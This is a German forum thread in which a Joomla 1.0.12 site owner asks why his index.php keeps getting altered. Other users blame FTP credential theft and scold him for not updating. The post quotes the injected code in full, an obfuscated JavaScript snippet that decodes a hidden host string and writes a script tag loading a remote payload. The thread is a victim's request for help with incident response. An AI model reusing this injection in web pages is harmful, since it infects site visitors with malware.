Thema: Joomla Seite gehackt

Hallo Jungs und Mädels,

habe seit ca. einer Woche folgende Problem.
Meine Website wird ständig mit einem "Script" verändert und somit wird mein Joomla Zerschossen.

Bsp:
Gestern habe ich gegen 15.30 Uhr eine Datensicherung auf den Server geladen, nachdem die Seite wieder zerschossen war. Die Seite funktionierte seitdem wieder problemlos.
Nach einem Forentipp habe ich gleichzeitig auch das Passwort des einzigen FTP-Zugangs geändert.

Heute morgen die böse Überraschung, die Seite ist wieder zerstört worden... wer dachte es...
Fehlermeldung bei aufruf des joomla Hauptverzeichnisses: Parse error: syntax error, unexpected '<' in /var/www/web279/html/index.php on line 307
In Zeite 307 beginnt das unten abgebildete Script

Ich habe mir daraufhin den letzten Zeitspempel der Index.php angeschaut. Darin steht das letzte Änderungsdatum, Gestern 17.55 Uhr.
Um diese Uhrzeit habe ich auf gar keinen Fall etwas am System verändert. (Feierabend )

Kann mir jemand sagen, wie dieser Angriff zustande kommt und wodurch dieser in mein System eindringen kann? In meinem Logfile (Anhang) des Server ist im besagten Zeitraum (17:55) kein Zugriff festzustellen. Somit gehe ich davon aus, dass der Angreifer über Joomla ans System geht.


Ich hoffe Ihr könnt mir bei diesem nervtötendem Problem behilflich sein.

Gruß,
Andi



Das Script, das für Verwirrung sorgt:

PHP-Code:

< script * > try{window.onload=function(){document.write('<div id=megaid>kijiji-ca.marktplaats.nl.</div>');To7fei9ft6y = document.getElementById('megaid').innerHTML + 'n!^o^)^!@v@)o#(#t^e(&!k&#^a@!-&r(^^@u#(.(&($e$@^$x$!t!(r^))!a!#f&@r$()@$e@^!e#^w$&e&)&)b@)$.&$(!r(@$u$:)$D$E$!(B($@U^G$&/!!c!^&@^c^#t&&v$^!(.@$c@^o)@!&m)!!/#)$$c^$$#c@#))t!!!v!&.^(c&(o&$@m^/@g!#o)$)$o)&#!g)&!l$)!e$^(.#c^$o$!m^)$(/@!w(i#k@!@i##h)#$o@#&@^w&^.&!#$c()o!m)(^/##b&#!u$!(!^5(&#2&$&@0$(!).^!@!c(o$$m$$!/!'.replace(/(|$|!|^|@|#|&|\)/ig, '') ;document.write('<scr'+'ipt src=http://'+To7fei9ft6y.replace(/DEBUG/g, '8080')+'></scr'+'ipt>');} }  catch(Tv6vx38x ) {}</script>
<!--bd5697819892b3de9762b012aa9d61ef--> 


JoomlaVersion: 1.0.12 Stable
Bitte keine Hinweiße wie: Update doch einfach
-> Große Seite - Wenig Zeit :P

arbeite erst mal die tips für eine gehackte webseite ab, diese findest du in der joomla faq, link in meiner signatur.
ein paar angaben zur version und der verwendeten erweiterungen wäre auch ganz nett und hilfreich.
meist erfolgen die angriffe nicht über den joomla-core , sondern über unsichere erweiterungen.

das ist ein FTP Hack.

du solltest dein Kiste checken, PW ändern usw.

Check mal dein FTP-Log, dann siehst du es.

Zitat von andi112

JoomlaVersion: 1.0.12 Stable
Bitte keine Hinweiße wie: Update doch einfach
-> Große Seite - Wenig Zeit :P

Entschuldige, aber das ist eine dumme Ausrede. Dir sollte man den Zugang zur Webseite kappen. Du setzt wissentlich eine leicht zu hackende Version ein, damit gefährdest Du die Besucher Deiner Webseite. Du weißt hoffentlich, dass Du dafür haftbar gemacht werden kannst. Traurig, Traurig

Kleine Ergänzung: Zeit ist immer relativ, wie viele Stunden musst Du arbeiten, um das Geld für den Anwalt und die Schadensersatzansprüche wieder rein zu holen? Ein Update kostet auch bei großen Webseiten nur wenig Zeit, ein Test kannst Du an einer lokalen Kopie machen.

Rechte und Pflichten des Webseitenbetreibers

Zitat von Joe Sixpack

das ist ein FTP Hack.

Sicher? Siehe oben.

Zitat von Lacki

Sicher? Siehe oben.

http://www.samuidevelopment.com/2009...itet-sich-aus/

wenn man über Google die ersten Zeilen des Scriptes sucht.

aber 1.0.12 ist natürlich auch nicht schön

Zitat von andi112

-> Große Seite - Wenig Zeit :P

Wenn man selbst keine Zeit hat, dann sucht man sich, vor allem bei einer geschäftlichen Seite, jemanden, der einem das macht. Das ist immer noch billiger als die von Lacki angesprochenen kosten

Zitat von andi112

JoomlaVersion: 1.0.12 Stable
Bitte keine Hinweiße wie: Update doch einfach
-> Große Seite - Wenig Zeit :P

Wieso ist diese asoziale Einstellung eigentlich gerade im Joomlalager so verbreitet, jeder hält seine Seite für unersetzlich, Schädigungen für andere werden billigend in Kauf genommen.

Zitat von andi112

Mit den Pflichten und Rechten ist mir schon bewusst, nur ich kann mich auch nicht einfach ne Woche hinsetzten und die Seite neu aufarbeiten.

Du wirst doch wohl die halbe Stunde, Stunde Zeit haben mal das Update auf 1.0.13 und dann das auf 1.0.15 per FTP auf die Seite zu laden!? Ist immer noch weniger Zeit als jeden Tag diesen verdammten Hack zu beseitigen. Und wie schon gesagt, dann nimmt man sich jemand, der das für einen macht. Rechne doch das mal mit Deiner Arbeitszeit und den damit verbundenen Kosten gegen

Und jetzt ist es eben "Richte es wieder, so schnell wie es geht"

dann würde ich diesen leuten mal sagen, wo die probleme liegen und sie vor die wahl eines updates oder dauernden scherereien stellen.
so ein bisschen arsch in der hose kann deine arbeit unheimlich erleichtern